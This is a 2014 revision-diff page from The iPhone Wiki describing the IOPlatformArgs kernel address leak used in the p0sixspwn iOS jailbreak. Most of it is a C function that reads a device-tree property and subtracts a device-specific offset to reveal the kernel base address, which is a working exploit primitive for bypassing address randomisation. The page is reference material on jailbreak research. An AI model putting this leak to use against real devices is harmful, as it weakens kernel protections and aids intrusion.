|
The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Difference between revisions of "IOPlatfromArgs leak"
(Created page with "Vulnerability used in p0sixspwn This vulnerability leaks the kernel base address. This is the code <code> unsigned long getKernelBase() { unsigned long buf; io_...") |
|||
| Line 29: | Line 29: | ||
} |
} |
||
return 0; |
return 0; |
||
| + | } // iH8sn0w |
||
| − | } |
||
</code> |
</code> |
||
Revision as of 18:14, 14 June 2014
Vulnerability used in p0sixspwn
This vulnerability leaks the kernel base address.
This is the code
unsigned long getKernelBase() {
unsigned long buf;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceNameMatching("device-tree"));
if(service)
{
CFDataRef macData = IORegistryEntryCreateCFProperty(service, CFSTR("IOPlatformArgs"), kCFAllocatorDefault, 0);
if(macData != NULL)
{
/*
void CFDataGetBytes (
CFDataRef theData,
CFRange range,
UInt8 *buffer
);
*/
CFDataGetBytes(macData, CFRangeMake(0,sizeof(buf)), &buf); // TODO: buf != UInt8
// XXX: TODO: change decrement based on device.
// N90 ONLY FOR NOW!
buf -= 0xE1C000; // Diff.
CFRelease(macData);
IOObjectRelease(service);
return buf;
}
IOObjectRelease(service);
}
return 0;
} // iH8sn0w
Once the attacker knows the virtual base, he can use the virt_to_phys macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug
